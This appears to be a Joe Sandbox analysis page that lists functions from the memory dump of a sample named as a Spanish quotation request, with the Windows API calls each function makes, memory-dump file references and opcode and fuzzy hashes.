Opcode ID: 3162e7f6ac18ce9e21bbe4a159d02d85eaed293b50cd532c3887e3e2abb148e4
Instruction ID: d81e6516278931a9401f2f23c99e29867e77a7d1a6cecfc7f12e2e624ca59ee9
Opcode Fuzzy Hash: 3162e7f6ac18ce9e21bbe4a159d02d85eaed293b50cd532c3887e3e2abb148e4
Instruction Fuzzy Hash: 9D310730A20719AFEF35CF658C087FA7BA9AB89310F14431BE485A21D1C375D9E59F52

Function 00297674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0029769A
GetWindowRect.USER32(?,?), ref: 00297710
PtInRect.USER32(?,?,00298B89), ref: 00297720
MessageBeep.USER32(00000000), ref: 0029778C

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 5baaa6c7946f3bbf17c61d7836d0ddc1b125616970ee90f384c9cbdc71aa54a3
Instruction ID: 670be0a97f89866cb8dd420f51c005c51e06e16bf7169fba410493433beafe8d
Opcode Fuzzy Hash: 5baaa6c7946f3bbf17c61d7836d0ddc1b125616970ee90f384c9cbdc71aa54a3
Instruction Fuzzy Hash: FB416B34A29215EFCF11CF98D898EE9B7F5FF89314F1581A9E8149B261C730A961CF90

Function 002916DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 002916EB

Part of subcall function 00263A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00263A57
Part of subcall function 00263A3D: GetCurrentThreadId.KERNEL32 ref: 00263A5E
Part of subcall function 00263A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002625B3), ref: 00263A65

GetCaretPos.USER32(?), ref: 002916FF
ClientToScreen.USER32(00000000,?), ref: 0029174C
GetForegroundWindow.USER32 ref: 00291752

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 6449271fdafb2952a2343a4a1ba515b993f508c374bff1baf40917f9189fb1c3
Instruction ID: f3e589e9e444a71ac47138b2ed21f1dfd2fd8e1134eb8f88266e358b217c25ce
Opcode Fuzzy Hash: 6449271fdafb2952a2343a4a1ba515b993f508c374bff1baf40917f9189fb1c3
Instruction Fuzzy Hash: 89313075D10249AFDB00EFA5C8858AEB7F9EF48304B5080AAE415E7252D7319E55CFA1

Function 0026D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0026D501
Process32FirstW.KERNEL32(00000000,?), ref: 0026D50F
Process32NextW.KERNEL32(00000000,?), ref: 0026D52F
CloseHandle.KERNEL32(00000000), ref: 0026D5DC

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 2ae508ec79ba6512ad4102c65cd2ea7a9218ae9069d73ff324f52854e9a7d014
Instruction ID: acf716b85e56ceb9e8dcc2f520fd5f717262e6ca4f1ee8d677d6b707976952cf
Opcode Fuzzy Hash: 2ae508ec79ba6512ad4102c65cd2ea7a9218ae9069d73ff324f52854e9a7d014
Instruction Fuzzy Hash: 9B31D1715183059FD300EF54D885AAFBBF8EF99344F50092DF586831E2EB719998CBA2

Function 00298FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00219BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00219BB2

GetCursorPos.USER32(?), ref: 00299001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00257711,?,?,?,?,?), ref: 00299016
GetCursorPos.USER32(?), ref: 0029905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00257711,?,?,?), ref: 00299094

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 3d30a497764b7d63b4b60054b32f2f20eddda569eb2920148d83aeb74976fb1b
Instruction ID: 84a19348448f67ccd887facc0c3262115a8a74c56a8de84949d036b3cbd0ab7c
Opcode Fuzzy Hash: 3d30a497764b7d63b4b60054b32f2f20eddda569eb2920148d83aeb74976fb1b
Instruction Fuzzy Hash: 29219F35610018FFDF258F99D858EEA7BB9EB8A360F14406AF91597261C3329DB0DB60

Function 0026D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0029CB68), ref: 0026D2FB
GetLastError.KERNEL32 ref: 0026D30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 0026D319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0029CB68), ref: 0026D376

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 8f4702669a4bd2eda673d190c366036aafd08830f580f9b6c7c15dc4eefb8847
Instruction ID: 335990a6eb62b95ffb642a64d4c2b4c850f2ee6026130e50276090c98c509ead
Opcode Fuzzy Hash: 8f4702669a4bd2eda673d190c366036aafd08830f580f9b6c7c15dc4eefb8847
Instruction Fuzzy Hash: F5219170A243069FC710EF24D88586A77E4AE56324F604A5DF899C73E2E730D9A5CF93

Function 00261571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00261014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0026102A
Part of subcall function 00261014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00261036
Part of subcall function 00261014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00261045
Part of subcall function 00261014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0026104C
Part of subcall function 00261014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00261062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 002615BE
_memcmp.LIBVCRUNTIME ref: 002615E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00261617
HeapFree.KERNEL32(00000000), ref: 0026161E

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 3d9afc82212816e4e7926c37617590c08977a4ff99e3c69154998d3486d97516
Instruction ID: ae8ed5c1efb0c1b06a70d69609c040e5803fe0260561681d1b45b78d13bb76de
Opcode Fuzzy Hash: 3d9afc82212816e4e7926c37617590c08977a4ff99e3c69154998d3486d97516
Instruction Fuzzy Hash: B421AC71E10109EFDF10DFA8D949BEEB7B8EF44354F184459E445AB241E730BAA5CBA0

Function 00292782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 0029280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00292824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00292832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00292840

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 71e11fe5732a5d775781d7ad020e6e18bf3e46bd1053a33bf6a85955073f4293
Instruction ID: 6cb64dbabd66d5a2d6410cc3fb8ade679bb3936e4c18141b5985dbf9b068af76
Opcode Fuzzy Hash: 71e11fe5732a5d775781d7ad020e6e18bf3e46bd1053a33bf6a85955073f4293
Instruction Fuzzy Hash: FA21B231214111FFDB14DB24CC44FAABB95AF45324F248159F41A9B6E2CB71EC56CBA0

Function 002678F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00268D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0026790A,?,000000FF,?,00268754,00000000,?,0000001C,?,?), ref: 00268D8C
Part of subcall function 00268D7D: lstrcpyW.KERNEL32(00000000,?,?,0026790A,?,000000FF,?,00268754,00000000,?,0000001C,?,?,00000000), ref: 00268DB2
Part of subcall function 00268D7D: lstrcmpiW.KERNEL32(00000000,?,0026790A,?,000000FF,?,00268754,00000000,?,0000001C,?,?), ref: 00268DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00268754,00000000,?,0000001C,?,?,00000000), ref: 00267923
lstrcpyW.KERNEL32(00000000,?,?,00268754,00000000,?,0000001C,?,?,00000000), ref: 00267949
lstrcmpiW.KERNEL32(00000002,cdecl,?,00268754,00000000,?,0000001C,?,?,00000000), ref: 00267984

Strings

cdecl, xrefs: 0026797B

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 685851b0cbfe21592f2c8a8df0c331ee011d1a4326f7e09d8fee058d26962397
Instruction ID: 8a67b4529732ebffd2416bfde3058276cbbbff0b97a49b5f4702aa0fc4adc2e8
Opcode Fuzzy Hash: 685851b0cbfe21592f2c8a8df0c331ee011d1a4326f7e09d8fee058d26962397
Instruction Fuzzy Hash: 8911293A211342ABCB155F38E844D7A77E5FF45354B50402AF806C7264EB319861CB61

Function 00295660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 002956BB
_wcslen.LIBCMT ref: 002956CD
_wcslen.LIBCMT ref: 002956D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 00295816

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: 883b6e851777408bd34d48e53494793e2c50b3cb656834e709961c5198ef671c
Instruction ID: 3f3f0a00c975b1078c7e8079e85041586129136c4cbe826201b60dbcb286c625
Opcode Fuzzy Hash: 883b6e851777408bd34d48e53494793e2c50b3cb656834e709961c5198ef671c
Instruction Fuzzy Hash: 4511D671730625A6EF21DFA1DC85AEE776CFF11760B104026F915D6081E7B0C9A4CFA0

Function 00261A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00261A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00261A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00261A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00261A8A

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: f16af87e38430e7a24bcdafb92e00a07b7a9a0d79863b2b4b64f2e9453dddeb5
Instruction ID: 90cb43e5ebf77f4b300804fa42cb07d475ce895a656b9d73d9aac991d46669f3
Opcode Fuzzy Hash: f16af87e38430e7a24bcdafb92e00a07b7a9a0d79863b2b4b64f2e9453dddeb5
Instruction Fuzzy Hash: 7F11393AD11219FFEB10DBE4CD85FADBB78EB08750F240492EA04B7294D6716E60DB94

Function 0026E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0026E1FD
MessageBoxW.USER32(?,?,?,?), ref: 0026E230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0026E246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0026E24D

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 863dbd54000fcf0326ee54d75b14dcf20fb618b87d99d1624f8953871ef6a905
Instruction ID: 5e4856828bce2e1342cbb18a2f1b46470847c0b0bce7788e99e48a06e81c91e9
Opcode Fuzzy Hash: 863dbd54000fcf0326ee54d75b14dcf20fb618b87d99d1624f8953871ef6a905
Instruction Fuzzy Hash: 95112676D14214BFCB019FA8FC0DA9E7FADAB45320F104256FC24E3291D2B0CE6487A0

Function 0022D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,0022CFF9,00000000,00000004,00000000), ref: 0022D218
GetLastError.KERNEL32 ref: 0022D224
__dosmaperr.LIBCMT ref: 0022D22B
ResumeThread.KERNEL32(00000000), ref: 0022D249

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 49783618925fb4139c77a5daeebd67c5b2d465e2bec5bb12463eb3ff6a5bdb50
Instruction ID: d9d51a5021733fc2fbf765706d5ba1a02f0b85bc64d55c370244c6ccda8a1c20
Opcode Fuzzy Hash: 49783618925fb4139c77a5daeebd67c5b2d465e2bec5bb12463eb3ff6a5bdb50
Instruction Fuzzy Hash: E701D636425225FBDB115FE5FC09BAE7A69DF82730F20031AFD25961D1CF708921CAA0

Function 0020600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0020604C
GetStockObject.GDI32(00000011), ref: 00206060
SendMessageW.USER32(00000000,00000030,00000000), ref: 0020606A

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 148d526d709cc5fbecdd21e5b1d4a89a246821ec17193a8e07548f162a96f92b
Instruction ID: 30d3e0f71ce86595605452efdbf4b26e18a56a03901ca5214f0cff9988eb7544
Opcode Fuzzy Hash: 148d526d709cc5fbecdd21e5b1d4a89a246821ec17193a8e07548f162a96f92b
Instruction Fuzzy Hash: 0611AD72511609BFEF124FA4DC48EEABB6EFF083A4F100202FA0452051C7329C70EBA0

Function 00223B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00223B56

Part of subcall function 00223AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00223AD2
Part of subcall function 00223AA3: ___AdjustPointer.LIBCMT ref: 00223AED

_UnwindNestedFrames.LIBCMT ref: 00223B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00223B7C
CallCatchBlock.LIBVCRUNTIME ref: 00223BA4

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: 46fe9b38b0c4939ac8a7a2a37263148d2239d538864c9e23525e47d98dee691e
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: E4012932110159BBDF12AE95EC42EEB3F6AEF48758F044014FE4856121C736E971DFA0

Function 00233073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,002013C6,00000000,00000000,?,0023301A,002013C6,00000000,00000000,00000000,?,0023328B,00000006,FlsSetValue), ref: 002330A5
GetLastError.KERNEL32(?,0023301A,002013C6,00000000,00000000,00000000,?,0023328B,00000006,FlsSetValue,002A2290,FlsSetValue,00000000,00000364,?,00232E46), ref: 002330B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0023301A,002013C6,00000000,00000000,00000000,?,0023328B,00000006,FlsSetValue,002A2290,FlsSetValue,00000000), ref: 002330BF

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 162c9f1278fb7abe7330416b79e31654305bfb553021af416721879b3bf96cbf
Instruction ID: 16934cca70a464f22534972fc75a1ad295e5982b5bf9527a01dfa89ecbb7f538
Opcode Fuzzy Hash: 162c9f1278fb7abe7330416b79e31654305bfb553021af416721879b3bf96cbf
Instruction Fuzzy Hash: EC01D472731623ABCB258F78AC88A577B98AF45B61F200622F905E7150CB21DB11C6E0

Function 00267464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0026747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00267497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 002674AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 002674CA

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: dc22a84fe1c44aff106019e1c6eff13a5af1c9440c0bc6dd50b63540b7ff1669
Instruction ID: 5398a862a883c5a55708b1cb9f50cea53f1f3ca1da124c7ee5772df4f5704d37
Opcode Fuzzy Hash: dc22a84fe1c44aff106019e1c6eff13a5af1c9440c0bc6dd50b63540b7ff1669
Instruction Fuzzy Hash: EC11A1B52153119BF7208F14FD0CB927BFCEB40B08F20856AA616D6191DBB0E954DBA0

Function 0026B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0026ACD3,?,00008000), ref: 0026B0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0026ACD3,?,00008000), ref: 0026B0E9
